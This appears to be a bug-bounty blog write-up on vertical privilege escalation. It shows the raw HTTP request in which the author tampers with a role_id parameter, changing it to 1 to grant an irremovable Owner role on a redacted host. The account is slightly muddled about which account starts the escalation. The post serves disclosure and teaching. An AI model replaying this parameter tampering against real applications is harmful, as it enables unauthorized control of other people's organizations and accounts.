Vertical Privilege escalation

What is Vertical Privilege escalation?

If a user can gain access to functionality that they are not permitted to access then this is vertical privilege escalation. For example, if a non-administrative user can in fact gain access to an admin page where they can delete user accounts, then this is vertical privilege escalation.

Case Study

As this was a private program all illustrations of vulnerabilities will be represented with the host as example.com

The application has a feature to add team members. The application has 3 levels of privileges:

  1. Owner ( highest privileges )
  2. Editor ( can read, write, update privilege of user and can invite other users)
  3. User ( Only read access )

The owner and editor can invite team members with the privileges of editor or user and every organization will have only one Owner no one can delete the owner not even the owner since the owner is created during the account creation for the first time for the organization.

POC ( Privilege escalation )

The owner of the organization can not be removed not even the owner can remove it. So somehow if a can create a user with owner privileges I can not be removed from the organization.

The first step was to create an account. I created 2 users one with the editor and the other one with user privileges.

after creating the users I logged in with the editor account and tried to change the user to editor privileges.

HTTP REQUEST

POST /account_users/123 HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: /;q=0.5, text/javascript, application/javascript, application/ecmascript, application/x-ecmascript
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://example.com/account/edit
X-CSRF-Token: 
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 83
Connection: close
Cookie: 

utf8=%E2%9C%93&_method=patch&account_user%5Brole_id%5D=&account_user%5Brole_id%5D=70452

If you see the post body the parameter role_id was vulnerable. The role_id parameter for the editor was 70452 and for a user, it was 70451. I changed the role_id=70452 to role_id=1

And I was able to escalate privilege from user to owner which no buddy can remove or edit.

Leave a Reply